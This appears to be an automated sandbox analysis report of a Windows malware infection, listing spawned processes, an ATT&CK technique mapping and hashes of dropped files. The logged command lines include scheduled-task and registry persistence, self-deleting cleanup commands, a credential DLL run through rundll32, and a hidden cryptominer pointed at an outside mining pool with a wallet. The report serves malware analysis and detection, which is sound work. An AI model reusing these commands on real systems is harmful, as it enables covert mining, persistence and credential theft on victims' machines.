"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:7144

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
- Executes dropped EXE
PID:4400

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:4856

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
7⤵
PID:6088

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6088 -s 1600
8⤵
- Program crash
PID:6404

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
5⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
PID:5768

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:2704

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:6036

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:5460

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:2116

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
PID:1456

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:6264

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:6528

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:6444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 1168
7⤵
- Program crash
PID:5420

C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"
4⤵
PID:4784

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\GRVF.9J8
5⤵
PID:176

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GRVF.9J8
6⤵
PID:3160

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\GRVF.9J8
7⤵
PID:6944

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\GRVF.9J8
8⤵
PID:6976

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"
4⤵
PID:2116

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe" -h
5⤵
PID:2596

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4168

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2460

C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe"
2⤵
- Executes dropped EXE
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1152
3⤵
- Program crash
PID:3508

C:\Users\Admin\Pictures\Adobe Films\real1801.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\real1801.bmp.exe"
2⤵
- Executes dropped EXE
PID:1732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im real1801.bmp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\real1801.bmp.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:3164

C:\Windows\SysWOW64\taskkill.exe
taskkill /im real1801.bmp.exe /f
4⤵
- Kills process with taskkill
PID:6348

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 1868
3⤵
- Program crash
PID:4276

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4988

C:\Windows\SysWOW64\ftp.exe
ftp -?
3⤵
PID:3156

C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe"
2⤵
- Executes dropped EXE
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 728
3⤵
- Program crash
PID:4896

C:\Users\Admin\Pictures\Adobe Films\Fenix_5.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix_5.bmp.exe"
2⤵
PID:1540

C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe"
2⤵
- Executes dropped EXE
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 2428
3⤵
- Program crash
PID:5144

C:\Users\Admin\Pictures\Adobe Films\Offscum.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\Offscum.exe.exe"
2⤵
- Executes dropped EXE
PID:5076

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
2⤵
PID:3560

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
3⤵
PID:756

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ffbde02e-59bd-4727-94c0-8d571b294108" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:2644

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:4484

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:5368

C:\Users\Admin\AppData\Local\4b5ac25b-f7e8-4119-bb8f-7ec918234318\build2.exe
"C:\Users\Admin\AppData\Local\4b5ac25b-f7e8-4119-bb8f-7ec918234318\build2.exe"
6⤵
PID:2364

C:\Users\Admin\AppData\Local\4b5ac25b-f7e8-4119-bb8f-7ec918234318\build2.exe
"C:\Users\Admin\AppData\Local\4b5ac25b-f7e8-4119-bb8f-7ec918234318\build2.exe"
7⤵
PID:4744

C:\Users\Admin\Pictures\Adobe Films\prolivv.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\prolivv.bmp.exe"
2⤵
- Executes dropped EXE
PID:2416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2060

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
4⤵
PID:5696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:4580

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
6⤵
PID:3244

C:\Windows\SysWOW64\REG.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
6⤵
- Modifies registry key
PID:3364

C:\Windows\SysWOW64\REG.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
6⤵
- Modifies registry key
PID:6148

C:\Users\Admin\Pictures\Adobe Films\TrdngAnlzr1805.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnlzr1805.exe.exe"
2⤵
- Executes dropped EXE
PID:4560

C:\Users\Admin\AppData\Local\Temp\AAH73.exe
"C:\Users\Admin\AppData\Local\Temp\AAH73.exe"
3⤵
PID:1492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1124
4⤵
- Program crash
PID:464

C:\Users\Admin\AppData\Local\Temp\C7ECK.exe
"C:\Users\Admin\AppData\Local\Temp\C7ECK.exe"
3⤵
PID:492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 1992
4⤵
- Program crash
PID:4572

C:\Users\Admin\AppData\Local\Temp\3AMCK.exe
"C:\Users\Admin\AppData\Local\Temp\3AMCK.exe"
3⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 1772
4⤵
- Program crash
PID:5692

C:\Users\Admin\AppData\Local\Temp\H56CK.exe
"C:\Users\Admin\AppData\Local\Temp\H56CK.exe"
3⤵
PID:2572

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\GRVF.9J8
4⤵
PID:5324

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GRVF.9J8
5⤵
PID:5648

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\GRVF.9J8
6⤵
PID:3284

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\GRVF.9J8
7⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\L7CHFL76C5EIGIM.exe
https://iplogger.org/1OUvJ
3⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 432
3⤵
- Program crash
PID:4168

C:\Users\Admin\Pictures\Adobe Films\arabcode_crypted_2.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\arabcode_crypted_2.bmp.exe"
2⤵
- Executes dropped EXE
PID:4968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2368

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2704

C:\Users\Admin\Pictures\Adobe Films\UnmaturedOddments.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\UnmaturedOddments.bmp.exe"
2⤵
- Executes dropped EXE
PID:5056

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
2⤵
- Executes dropped EXE
PID:4488

C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_2.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_2.bmp.exe"
2⤵
- Executes dropped EXE
PID:3980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:3828

C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe"
2⤵
- Executes dropped EXE
PID:4384

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"
3⤵
PID:700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
4⤵
PID:4180

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
5⤵
PID:3504

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe" /F
4⤵
- Creates scheduled task(s)
PID:3560

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b51ecacb95f3fd\cred.dll, Main
4⤵
PID:6072

C:\Users\Admin\Pictures\Adobe Films\lokes.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\lokes.bmp.exe"
2⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 872
3⤵
- Program crash
PID:5428

C:\Users\Admin\Pictures\Adobe Films\mixinte2001.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2001.bmp.exe"
2⤵
- Executes dropped EXE
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 460
3⤵
- Program crash
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 776
3⤵
- Program crash
PID:6392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 784
3⤵
- Program crash
PID:6664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 832
3⤵
- Program crash
PID:6880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 864
3⤵
- Program crash
PID:7128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 984
3⤵
- Program crash
PID:5268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1012
3⤵
- Program crash
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1372
3⤵
- Program crash
PID:6360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte2001.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte2001.bmp.exe" & exit
3⤵
PID:6204

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte2001.bmp.exe" /f
4⤵
- Kills process with taskkill
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1384
3⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1476
3⤵
- Program crash
PID:4660

C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe"
2⤵
- Executes dropped EXE
PID:4336

C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"
2⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
3⤵
PID:5008

C:\Windows\SysWOW64\timeout.exe
timeout 45
4⤵
- Delays execution with timeout.exe
PID:5068

C:\Users\Admin\AppData\Local\Temp\Ayjcvcqohpnpukmlujdochqmax1.exe
"C:\Users\Admin\AppData\Local\Temp\Ayjcvcqohpnpukmlujdochqmax1.exe"
3⤵
PID:6700

C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"
3⤵
PID:6728

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5060

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4324

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\6d8b0fb8e2d94f7d8c4bf249e5d3a848 /t 2296 /p 3888
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2216 -ip 2216
1⤵
PID:2080

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4560 -ip 4560
1⤵
PID:1472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 5464 -ip 5464
1⤵
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1820 -ip 1820
1⤵
PID:5484

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:5828

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 604
3⤵
- Program crash
PID:6020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5852 -ip 5852
1⤵
PID:5952

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:2016

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 556
3⤵
- Program crash
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6092 -ip 6092
1⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4284 -ip 4284
1⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2124 -ip 2124
1⤵
PID:5480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1792 -ip 1792
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4400 -ip 4400
1⤵
PID:2716

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 6088 -ip 6088
1⤵
PID:6188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4284 -ip 4284
1⤵
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4284 -ip 4284
1⤵
PID:6568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 4284 -ip 4284
1⤵
PID:6852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4284 -ip 4284
1⤵
PID:7048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3636 -ip 3636
1⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1492 -ip 1492
1⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4284 -ip 4284
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 492 -ip 492
1⤵
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3636 -ip 3636
1⤵
PID:5428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 4284 -ip 4284
1⤵
PID:1168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3636 -ip 3636
1⤵
PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4284 -ip 4284
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3636 -ip 3636
1⤵
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4284 -ip 4284
1⤵
PID:7140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3636 -ip 3636
1⤵
PID:6636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 3808 -ip 3808
1⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1536 -ip 1536
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 4284 -ip 4284
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3636 -ip 3636
1⤵
PID:5300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5076 -ip 5076
1⤵
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3636 -ip 3636
1⤵
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1732 -ip 1732
1⤵
PID:2340

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
1⤵
PID:6832

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
41fbbfef77c9e15df36e1cb541503d98

SHA1
c2e6a702ecb76de3321d194644d0bd73d479cecb

SHA256
1c596fd0b7231e43e672cb027be6117200830dd98929f060c3a97f8efc4eae17

SHA512
9f26e615f952b673ce80740ee48e37ac44fd27c7bb280f1d1cc4fec614ccd2c95dd4a19dbb0f09e94fa2e0fc65a92de9a2e64e358040c2bfc523ec162377d08e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
8f944081c4d9c3676acf6782d7cc146b

SHA1
af236bfa6f96c92bf33a2a9c9c3cc12e381cc514

SHA256
749c7936ec38cc6da0ae1563a1bdc87df9c645bd42d87373207cd320f9c48cf1

SHA512
e6b80d6f45726fcbdc62c9b593aff64ed3d1c7fec1d5aa0a61fa6db0fc4158f495edf7919d98d17b3ddbfe62a088e56a2ff8c62b3c7b8b668c6f89450c0ba3ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\_metadata\verified_contents.json
Filesize
2KB

MD5
e2d5c71df87717a3dfaf911dbbf92005

SHA1
709bb3ac3481269a4bdbd78e7e7465b873fe1d89

SHA256
6cb9568bf231150c816d36a15150c7dbd1c770cf9eba1ed745528167c6d2da7d

SHA512
23338979506912ca5fd0cf2330c6f54ecd98e9bc606a6a58683147f2a3ed027aad874050b04c8fac9f6e189618e6bbb4716ba8b959aa9321c69517b9ac8c7ae6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\assets\background.html
Filesize
207B

MD5
ab286904aa8ab474aa6ec10d36ca73b2

SHA1
2b5a7be011e08cd74c12e636e8cbc6d055328831

SHA256
d4811920b1a5ba578f84c5571e01352303e3b080c1bd7c1ee780670179836123

SHA512
63287016a4a9fcb6dc3ec513c3b4e101c614a17a0b009014c4c7d844649c1a2aab47b32ad7e091559d4477c5904baf0d46bf7dc793d9428f6d0fa9bba1f9933c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\assets\icons\128x128.png
Filesize
7KB

MD5
5987038aa0253d5704e62c32d59ffb44

SHA1
25a00249fa02a6c55ddb600ca19bc0a2941325b9

SHA256
82477eea0c18a332aff8216df5dc86708bfdb8675339e363ae25ad65c3a0d43e

SHA512
d58e40116e2794ed12e71c43425a3561af121dd979f22bc87c9b0b540fe8efe67f703599d54f362da8998ed1e7e639541a9334d77552687e019b9f333cf1f8dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\assets\icons\16x16.png
Filesize
737B

MD5
ff5b2ba0e57c85de1d2a4d45709212da

SHA1
6c33c1e5ed0b46ccd416c8b8b97551c050c8f366

SHA256
be3aabc166ef57b36923379396e86783c4fff17207a2536c5d4a0caff64b1c60

SHA512
353ecb9853e6a662d0444ca0c8deefe0f0572d394498d734e943daad96a279d4e9ec9ed76a4972f689ab277042296f4baee8c86f8056b271fe14c7e51596dea1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\assets\icons\24x24.png
Filesize
1KB

MD5
d90ed009f2cc3df050b605367682261d

SHA1
12e8ee4169bb8971b1adebd72c39e6d878997896

SHA256
